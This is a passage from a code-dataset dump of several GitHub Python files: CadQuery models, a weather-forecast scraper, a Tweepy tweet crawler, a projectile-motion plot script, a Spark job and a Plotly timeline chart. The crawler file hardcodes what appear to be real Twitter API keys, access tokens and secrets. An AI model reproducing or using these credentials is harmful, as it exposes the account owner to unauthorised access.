"dealify_utils.log", "line_number": 166, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 166, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 169, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 169, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 170, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 170, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 170, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 171, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 171, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 175, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "1449793297", "text": "#!/usr/bin/env python3\n\n# referred to https://cadquery.readthedocs.io/en/latest/assy.html\n\nimport cadquery as cq\n\n\ndef book_model():\n book_length = 10\n book_width = 8\n book_thickness = 1\n spine_thickness = 0.8\n assy = cq.Assembly()\n\n book_body = cq.Workplane(\"XY\").box(book_length, book_width, book_thickness)\n\n spine = (\n cq.Workplane(\"XY\")\n .box(\n book_length, spine_thickness, book_thickness + 0.2\n ) # Making spine slightly larger\n .translate((0, book_width / 2 - spine_thickness / 2, 0))\n )\n\n assy.add(book_body, name=\"book_body\")\n assy.add(spine, name=\"spine\")\n return assy\n\n\ndef torch_model():\n flame = cq.Solid.makeCone(2, 0, 5).translate((0, 0, 2))\n assy = cq.Assembly()\n\n assy.add(flame, name=\"flame\")\n assy.add(\n cq.Solid.makeCone(2, 1, 15),\n 
loc=cq.Location((0, 0, 0), (1, 0, 0), 180),\n name=\"handle\",\n )\n assy.add(\n cq.Solid.makeCone(3.5, 2.5, 2).translate((0, 0, -2)),\n loc=cq.Location((0, 0, 0), (1, 0, 0), 180),\n name=\"middle\",\n )\n return assy\n\n\ndef desk_model():\n desk_top_length = 10\n desk_top_width = 8\n desk_top_thickness = 1\n\n leg_length = 6\n leg_width = 1\n\n assy = cq.Assembly()\n desk_top = cq.Workplane(\"XY\").box(\n desk_top_length, desk_top_width, desk_top_thickness\n )\n\n def create_leg(x, y):\n return (\n cq.Workplane(\"XY\")\n .box(leg_width, leg_width, leg_length)\n .translate((x, y, leg_length / 2 + desk_top_thickness / 2))\n )\n\n legs = [\n create_leg(\n desk_top_length / 2 - leg_width / 2, desk_top_width / 2 - leg_width / 2\n ),\n create_leg(\n -desk_top_length / 2 + leg_width / 2, desk_top_width / 2 - leg_width / 2\n ),\n create_leg(\n desk_top_length / 2 - leg_width / 2, -desk_top_width / 2 + leg_width / 2\n ),\n create_leg(\n -desk_top_length / 2 + leg_width / 2, -desk_top_width / 2 + leg_width / 2\n ),\n ]\n\n assy.add(desk_top, name=\"desk_top\")\n for i in range(4):\n assy.add(legs[i], loc=cq.Location((0, 0, 0), (1, 0, 0), 180), name=f\"leg{i}\")\n return assy\n\n\nMODELS = {\"book\": book_model, \"torch\": torch_model, \"desk\": desk_model}\n\nif __name__ == \"__main__\":\n import argparse\n\n p = argparse.ArgumentParser(description=\"Export STEP models to files\")\n p.add_argument(\"model\", choices=MODELS.keys(), help=\"Model to export\")\n p.add_argument(\"output\", help=\"Output STEP file\")\n\n args = p.parse_args()\n\n modfn = MODELS[args.model]\n assy = modfn()\n assy.save(args.output)\n", "repo_name": "sree314/stepcvt", "sub_path": "tests/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cadquery.Assembly", "line_number": 13, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 15, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 18, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 31, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cadquery.Assembly", "line_number": 32, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 36, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cadquery.Location", "line_number": 37, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 41, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cadquery.Location", "line_number": 42, "usage_type": "call"}, {"api_name": "cadquery.Assembly", "line_number": 56, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 57, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 63, "usage_type": "call"}, {"api_name": "cadquery.Location", "line_number": 85, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "20060442498", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nimport random\nimport time\nimport logging\nimport traceback\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - 
%(message)s')\nlogger = logging.getLogger(__name__)\n\nheaders = {'Accept': '*/*',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 '\n 'Safari/537.36',\n 'Connection': 'keep-alive'}\n\n\ncity_url = {\"ld\": \"https://www.accuweather.com/zh/gb/london/ec4a-2/hourly-weather-forecast/328328?hour=%s\",\n \"bj\": \"https://www.accuweather.com/zh/cn/beijing/101924/hourly-weather-forecast/101924?hour=%s\"}\n\n\ndef get_data(hour, city='bj'):\n \"\"\"\n\tget the weather forecast data in the next eight hours\n\n\tParameters\n\t----------\n\thour: int\n\t\tcurrent hour + how many hours between current hour and the target hour you want\n\t\te.g. now is 11:00:00, you want 18:00:00, the variable hour should be 18\n\t\t\t if you want 18:00:00 tomorrow, the variable hour should be 42\n\n\tReturns\n\t----------\n\tdata: list\n\t\teach element contains one feature of weather data, like\n\t\t\t['温度', '16°', '17°', '18°', '19°', '20°', '19°', '18°', '17°']\n :param hour:\n :param city:\n\n\t\"\"\"\n url = city_url[city] % hour\n logger.debug('fetch url: %s' % url)\n r = requests.get(url, headers=headers)\n soup = BeautifulSoup(r.text, 'lxml')\n data = [i for d in soup.find_all(class_='hourly-table') for i in d.stripped_strings]\n data = [data[i: i + 9] for i in range(len(data)) if i % 9 == 0][:-2]\n return data\n\n\ndef parse_data(data, timestamp):\n \"\"\"\n\tparse the data got from the function get_data(hour)\n\n\tParameters\n\t----------\n\tdata: list\n\t\tlist from function get_data(hour)\n\n\ttimestamp: datetime.datetime\n\t\tthe datetime of the first element in variable data\n\n\tReturns\n\t----------\n\tresults: dict\n\t\tall weather forecast data from the timestamp as beginning to the eight hours later\n\t\"\"\"\n results = []\n t = [[i[index] for i in data[1:]] for index in range(1, 9)]\n columns = [i[0] for i in data[1:]]\n for index in range(len(t)):\n delta = timedelta(hours=index)\n r = dict(zip(columns, t[index]))\n r['时间'] = datetime.strftime(timestamp + delta, '%Y-%m-%d %H:00:00')\n del r['降水']\n del r['天空']\n results.append(r)\n return results\n\n\ndef get_batch_data(now, city='bj'):\n \"\"\"\n\tget two days weather forecast data from now on\n\tParameters\n\t----------\n\tnow: datetime.datetime\n\t\tnow time\n\n\tReturns\n\t----------\n\tdata: str\n\t\tjson string ends with '\\n'\n\t\"\"\"\n global delta\n results = []\n for i in range(7):\n delta = timedelta(hours=i * 8)\n\n data = get_data(now.hour + i * 8, city)\n logger.info('got data of %s' % (datetime.strftime(now + delta, '%Y-%m-%d %H:00:00')))\n results.extend(parse_data(data, now + delta))\n\n time.sleep(random.uniform(0, 3))\n\n if len(results) != 56:\n logger.warning(\n 'there may be something wrong with data length of %s' % datetime.strftime(now + delta, '%Y-%m-%d %H:00:00'))\n\n data = json.dumps({'time': datetime.strftime(now, '%Y-%m-%d %H:00:00'), 'data': results}) + '\\n'\n logger.info('got data successfully!')\n return data\n\n\ndef insert_data_into_file(data, filename='data_ld.txt'):\n \"\"\"\n\tinsert json string into file\n\n\tParameters\n\t----------\n\tdata: str\n\t\tthe json string from the function get_batch_data(now)\n\n\tfilename: str\n which file you want to save the data\n\t\"\"\"\n with open(filename, 'w') as f:\n f.write(data)\n logger.info('insert data into file successfully!')\n\n\ndef fetch(city='bj'):\n \"\"\"\n\tfetch the data and save them into a file\n\t\"\"\"\n now = datetime.now()\n logger.info('start fetching weather data at %s' % 
(datetime.strftime(now, '%Y-%m-%d %H:%M:%S')))\n insert_data_into_file(get_batch_data(now, city),\n filename=\"data/{}_{}.txt\".format(city, datetime.strftime(now, '%m_%d_%H')))\n\n\nif __name__ == '__main__':\n while True:\n retry_times = 0\n success = False\n while retry_times < 10:\n if success:\n break\n try:\n fetch(city=\"bj\")\n fetch(city=\"ld\")\n success = True\n except Exception as e:\n logger.error(e)\n traceback.print_exc(file=open('traceback_ld.txt', 'a'))\n retry_times += 1\n time.sleep(30)\n else:\n logger.error('program has fatal error!')\n time.sleep(1800)\n", "repo_name": "Logan-Lin/KDD_Data_process_NG", "sub_path": "forecast/weather_forecast.py", "file_name": "weather_forecast.py", "file_ext": "py", "file_size_in_byte": 4656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 138, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 141, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 141, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 157, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 159, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "40154438591", "text": "import time\nimport tweepy\nfrom sentiment.models import Tweet\n\ndef crawl_tweet(input_query):\n access_token = \"3221004481-HdKucoOhc3D8vtVHHhzx6r39wBM5k9Il5CHm7bI\"\n access_token_secret = \"4LWYCLTcngX2M6fBznA9w88FDLZGR1rA4lcbKXmgdX6GX\"\n api_key = \"XjAWG9nyEJ4d88bvRkC8phix9\"\n api_key_secret = \"xSmszxt2ZDoEJ27mVzYiHKmeA3XCB1YZjPYAIJYjfXIHEKiLbS\"\n\n auth = tweepy.OAuthHandler(api_key, api_key_secret)\n auth.set_access_token(access_token,access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n \n crawlTweets = 
[]\n\n for tweet in tweepy.Cursor(api.search_tweets,q=input_query,count=15,lang=\"id\").items():\n tweets = {\n 'tweet_id':tweet.id,\n 'created_at':tweet.created_at,\n 'user_name':tweet.user.screen_name,\n 'text':tweet.text.encode(\"utf-8\"),\n }\n crawlTweets.append(tweets)\n \n\n return crawlTweets\n\nclass MyStreamListener(tweepy.Stream):\n \n def __init__(self, time_limit=300):\n self.start_time = time.time()\n self.limit = time_limit\n super(MyStreamListener, self).__init__()\n \n def on_connect(self):\n print(\"Connected to Twitter API.\")\n \n def on_status(self, status):\n \n res = {}\n # Tweet ID\n tweet_id = status.id\n \n # User ID\n user_id = status.user.id\n # Username\n username = status.user.name\n \n \n # Tweet\n if status.truncated == True:\n tweet = status.extended_tweet['full_text']\n hashtags = status.extended_tweet['entities']['hashtags']\n else:\n tweet = status.text\n hashtags = status.entities['hashtags']\n \n # Read hastags\n # hashtags = read_hashtags(hashtags) \n \n # Retweet count\n # retweet_count = status.retweet_count\n # Language\n lang = status.lang\n \n print(status.text)\n # If tweet is not a retweet and tweet is in English\n # if not hasattr(status, \"retweeted_status\") and lang==\"id\":\n # Connect to database\n # dbConnect(user_id, username, tweet_id, tweet, retweet_count, hashtags)\n # tweet = {\n # 'tweet_id':status.id,\n # # 'created_at':status.created_at,\n # 'user_name':status.user.screen_name,\n # 'text':status.text.encode(\"utf-8\"),\n # }\n # res.append(tweet)\n # Tweet.objects.bulk_create(res)\n \n \n if (time.time() - self.start_time) > self.limit:\n \n print(time.time(), self.start_time, self.limit)\n return False\n \n def on_error(self, status_code):\n if status_code == 420:\n # Returning False in on_data disconnects the stream\n return False", "repo_name": "alvinrrizky/Sentigovt24", "sub_path": "sentiment/crawl.py", "file_name": "crawl.py", "file_ext": "py", "file_size_in_byte": 2858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 13, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 17, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 29, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "time.time", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "36813498874", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.transforms import Bbox\nimport numpy as np\nfrom scipy.optimize import minimize\nimport seaborn as sns\n\n# Accepting only numeric input from the user\ndef check_numeric(value):\n \"\"\"Checks if a string value is numeric and converts it to int or float\"\"\"\n while True:\n try:\n value = int(value)\n break\n except ValueError:\n try: \n value = float(value)\n break\n except ValueError:\n value = input(\"Please, enter a numerical value: \")\n return value\n \n# Receiving initial values from the user\nv_0 = check_numeric(input(\"Enter initial velocity [m/s]: \"))\nangle_degrees = check_numeric(input(\"Enter angle of launch [deg]: \"))\nangle = angle_degrees*(np.pi/180)\nheight = check_numeric(input(\"Enter initial height [m]: \"))\n\n# Projectile motion functions\ndef t_flight(v_0, angle, height, g=9.81):\n \"\"\"Returns time of flight\"\"\"\n tf = 
(v_0*np.sin(angle)+((v_0*np.sin(angle))**2+2*g*height)**0.5)/g\n return tf\n\ndef h_range(v_0, angle, height, g=9.81):\n \"\"\"Returns horizontal range\"\"\"\n h = v_0*np.cos(angle)*t_flight(v_0, angle, height, g)\n return h\n\ndef y(x, g=9.81):\n \"\"\"Returns the height at any point of the motion\"\"\"\n y = np.tan(angle)*x-(g*(x**2))/(2*(v_0*np.cos(angle))**2)+height\n return y\n\ntime_of_flight = t_flight(v_0, angle, height)\nhorizontal_range = h_range(v_0, angle, height)\nx = np.linspace(0, horizontal_range, 100)\nh = y(x)\n\nguess = np.array([1])\nmax_x = minimize(lambda x: -y(x),guess)\nmax_y = y(max_x.x[0]) \n\n# Set color palette\nsns.set_style('darkgrid')\n\n# Plotting figure\nplt.figure(num=1, dpi=120, figsize=(9,6))\nplt.plot(x,h,'b')\nplt.title('Projectile Motion',\n color='k',\n fontweight='bold',\n fontname='Century Gothic',\n size=18)\nplt.xlabel('Distance [m]',\n fontweight='bold',\n fontname='Century Gothic',\n size=14)\nplt.ylabel('Height [m]',\n fontweight='bold',\n fontname='Century Gothic',\n size=14)\nplt.plot(horizontal_range,0, marker='D', color='r')\nplt.plot(max_x.x[0],max_y, marker='D', color='g')\nplt.annotate(f'Max range\\n {round(horizontal_range,2)} [m]',\n xy=(horizontal_range,0),\n xytext=(0.865,0.725),\n xycoords='data',\n textcoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n arrowprops=dict(arrowstyle='<|-',\n connectionstyle='arc3',\n edgecolor='r',\n facecolor='r'),\n bbox=dict(facecolor='w', edgecolor='r', boxstyle='round'))\nplt.annotate(f'Time of flight\\n {round(time_of_flight,2)} [s]',\n xy=(0.865,0.825),\n xycoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n bbox=dict(facecolor='w', edgecolor='b', boxstyle='round'))\nplt.annotate(f'Max height\\n x: {round(max_x.x[0],2)} [m]; y: {round(max_y,2)} [m]',\n xy=(max_x.x[0],max_y),\n xytext=(0.735,0.925),\n xycoords='data',\n textcoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n arrowprops=dict(arrowstyle='<|-',\n connectionstyle='arc3',\n edgecolor='g',\n facecolor='g'),\n bbox=dict(facecolor='w', edgecolor='g', boxstyle='round'))\nplt.show()", "repo_name": "yarib97/Projectile_Motion", "sub_path": "Projectile_Motion.py", "file_name": "Projectile_Motion.py", "file_ext": "py", "file_size_in_byte": 3504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.tan", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 50, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "19808534882", "text": "import sys\nfrom csv import reader\nfrom pyspark import SparkContext\nfrom decimal import Decimal\n\nif __name__ == \"__main__\":\n sc = SparkContext()\n lines = sc.textFile(sys.argv[1], 1)\n lines = lines.mapPartitions(lambda x: reader(x))\n res1 = lines.map(lambda x: (x[2],(0 if int(x[1][-2:]) in (5,6,12,13,19,20,26,27) else 1)))\n res2 = res1.reduceByKey(lambda x, y: x + y)\n res3 = lines.map(lambda x: (x[2],(1 if int(x[1][-2:]) in (5,6,12,13,19,20,26,27) else 0))) \n res4 = res3.reduceByKey(lambda x, y: x + y)\n \n res5 = res2.map(lambda x: (x[0], Decimal(Decimal(x[1])/23).quantize(Decimal('.01'))))\n res6 = res4.map(lambda x: (x[0], Decimal(Decimal(x[1])/8).quantize(Decimal('.01'))))\n res6.fullOuterJoin(res5).map(lambda x: (x[0],x[1][0],x[1][1])).map(lambda x: \"{0}\\t{1}, {2}\".format(x[0], x[1], x[2])).saveAsTextFile(\"task7.out\")\n sc.stop()\n\n", "repo_name": "bene802/BigData", "sub_path": "Spark/task7.py", "file_name": "task7.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyspark.SparkContext", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 15, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74124303555", "text": "\"\"\"R daattali/TimeVis-like charts for displaying chronological data.\n\nSee daattali/TimeVis: https://github.com/daattali/timevis\n\n# NOTE: Consider automated (non-overlapping) text/event placement\n\n- MATLAB Adjust Text: https://github.com/Phlya/adjustText\n- D3 Labeler: https://github.com/tinker10/D3-Labeler\n- Plotly has implementation for contour? 
https://github.com/plotly/plotly.js/issues/4674#issuecomment-603571483\n\n\"\"\"\n\nimport numpy as np\nimport plotly.graph_objects as go\n\nfrom .utils_data import DASHED_TIME_FORMAT_YEAR, GDP_TIME_FORMAT, format_unix, get_unix\nfrom .utils_fig import CustomChart\n\n\nclass TimeVisChart(CustomChart): # noqa: H601\n \"\"\"Time Vis Chart: resource use timeline.\"\"\"\n\n date_format = DASHED_TIME_FORMAT_YEAR\n \"\"\"Date format for bar chart. Default is `DASHED_TIME_FORMAT_YEAR`.\"\"\"\n\n fillcolor = '#D5DDF6'\n \"\"\"Default fillcolor for time vis events.\"\"\"\n\n hover_label_settings = {'bgcolor': 'white', 'font_size': 12, 'namelength': 0}\n \"\"\"Plotly hover label settings.\"\"\"\n\n rh = 1\n \"\"\"Height of each rectangular time vis.\"\"\"\n\n y_space = -1.5 * rh\n \"\"\"Vertical spacing between rectangles.\"\"\"\n\n categories = None\n \"\"\"List of string category names set in self.create_traces().\"\"\"\n\n _shapes = []\n \"\"\"List of shapes for plotly layout.\"\"\"\n\n def create_traces(self, df_raw): # noqa: CCR001\n \"\"\"Return traces for plotly chart.\n\n Args:\n df_raw: pandas dataframe with columns: `(category, label, start, end)`\n\n Returns:\n list: Dash chart traces\n\n \"\"\"\n # Get all unique category names and create lookup for y positions\n self.categories = sorted(cat for cat in set(df_raw['category'].tolist()) if cat)\n y_pos_lookup = {cat: self.y_space * idx for idx, cat in enumerate(self.categories)}\n # Create the Time Vis traces\n traces = []\n self._shapes = []\n self._annotations = []\n for vis in df_raw.itertuples():\n if vis.category in y_pos_lookup:\n y_pos = y_pos_lookup[vis.category]\n if vis.end:\n traces.append(self._create_time_vis_shape(vis, y_pos))\n if vis.label:\n traces.append(self._create_annotation(vis, y_pos))\n else:\n traces.append(self._create_event(vis, y_pos))\n else:\n y_pos = 0\n traces.append(self._create_non_cat_shape(vis, y_pos))\n return traces\n\n def _create_hover_text(self, vis):\n \"\"\"Return hover text for given trace.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n\n Returns:\n string: HTML-formatted hover text\n\n \"\"\"\n new_format = f'%a, {GDP_TIME_FORMAT}'\n start_date = format_unix(get_unix(vis.start, self.date_format), new_format)\n if vis.end:\n end_date = format_unix(get_unix(vis.end, self.date_format), new_format)\n date_range = f'Start: {start_date}<br>End: {end_date}'\n else:\n date_range = f'Event: {start_date}'\n return f'{vis.category}<br>{vis.label}<br>{date_range}'\n\n def _create_non_cat_shape(self, vis, y_pos):\n \"\"\"Create non-category time visualization (vertical across all categories).\n\n Note: background shape is set below a transparent trace so that hover works\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n bot_y = self.y_space * len(self.categories)\n self._shapes.append(\n go.layout.Shape(\n fillcolor=self.fillcolor,\n layer='below',\n line={'width': 0},\n opacity=0.4,\n type='rect',\n x0=vis.start,\n x1=vis.end,\n xref='x',\n y0=bot_y,\n y1=y_pos,\n yref='y',\n ),\n )\n return go.Scatter(\n fill='toself',\n opacity=0,\n hoverlabel=self.hover_label_settings,\n line={'width': 0},\n mode='lines',\n text=self._create_hover_text(vis),\n x=[vis.start, vis.end, vis.end, vis.start, vis.start],\n y=[y_pos, y_pos, bot_y, bot_y, y_pos],\n )\n\n def _create_time_vis_shape(self, vis, y_pos):\n \"\"\"Create filled rectangle for time visualization.\n\n Args:\n 
vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n return go.Scatter(\n fill='toself',\n fillcolor=self.fillcolor,\n hoverlabel=self.hover_label_settings,\n line={'width': 0},\n mode='lines',\n text=self._create_hover_text(vis),\n x=[vis.start, vis.end, vis.end, vis.start, vis.start],\n y=[y_pos, y_pos, y_pos - self.rh, y_pos - self.rh, y_pos],\n )\n\n def _create_annotation(self, vis, y_pos):\n \"\"\"Add vis label to chart as text overlay.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n return go.Scatter(\n hoverlabel=self.hover_label_settings,\n hovertemplate=self._create_hover_text(vis) + '<extra></extra>',\n hovertext=self._create_hover_text(vis),\n mode='text',\n text=vis.label,\n textposition='middle right',\n x=[vis.start],\n y=[y_pos - self.rh / 2],\n )\n\n def _create_event(self, vis, y_pos):\n \"\"\"Create singular event with vertical line, marker, and text.\n\n If label is longer than 10 characters, then the annotation is shown offset with an arrow.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n if len(vis.label) > 10:\n self._annotations.append({\n 'align': 'right',\n 'arrowcolor': self.fillcolor,\n 'showarrow': True,\n 'arrowhead': 2,\n 'text': vis.label,\n 'x': vis.start,\n 'xanchor': 'right',\n 'y': y_pos - self.rh / 2,\n 'yanchor': 'middle',\n })\n self._shapes.append(\n go.layout.Shape(\n layer='below',\n line={\n 'color': self.fillcolor,\n 'dash': 'longdashdot',\n 'width': 2,\n },\n type='line',\n x0=vis.start,\n x1=vis.start,\n xref='x',\n y0=self.y_space * len(self.categories),\n y1=y_pos - self.rh / 2,\n yref='y',\n ),\n )\n return go.Scatter(\n hoverlabel=self.hover_label_settings,\n hovertemplate=self._create_hover_text(vis) + '<extra></extra>',\n hovertext=self._create_hover_text(vis),\n marker={'color': self.fillcolor},\n mode='markers+text',\n text='' if len(vis.label) > 10 else vis.label,\n textposition='top center',\n x=[vis.start],\n y=[y_pos - self.rh / 2],\n )\n\n def create_layout(self):\n \"\"\"Extend the standard layout.\n\n Returns:\n dict: layout for Dash figure\n\n \"\"\"\n layout = super().create_layout()\n # Set YAxis tick marks for category names (https://plotly.com/python/tick-formatting)\n layout['yaxis']['tickmode'] = 'array'\n layout['yaxis']['tickvals'] = np.subtract(\n np.multiply(\n np.array(range(len(self.categories))),\n self.y_space,\n ),\n self.rh / 2,\n )\n layout['yaxis']['ticktext'] = [*self.categories]\n layout['yaxis']['zeroline'] = False\n # Hide legend\n layout['legend'] = {}\n layout['showlegend'] = False\n # Add shapes and append new annotations\n layout['shapes'] = self._shapes\n layout['annotations'] += self._annotations\n return layout\n", "repo_name": "KyleKing/dash_charts", "sub_path": "dash_charts/time_vis_chart.py", "file_name": "time_vis_chart.py", "file_ext": "py", "file_size_in_byte": 8579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils_fig.CustomChart", "line_number": 20, "usage_type": "name"}, {"api_name": "utils_data.DASHED_TIME_FORMAT_YEAR", "line_number": 23, "usage_type": "name"}, {"api_name": "utils_data.GDP_TIME_FORMAT", "line_number": 85, "usage_type": "name"}, {"api_name": 
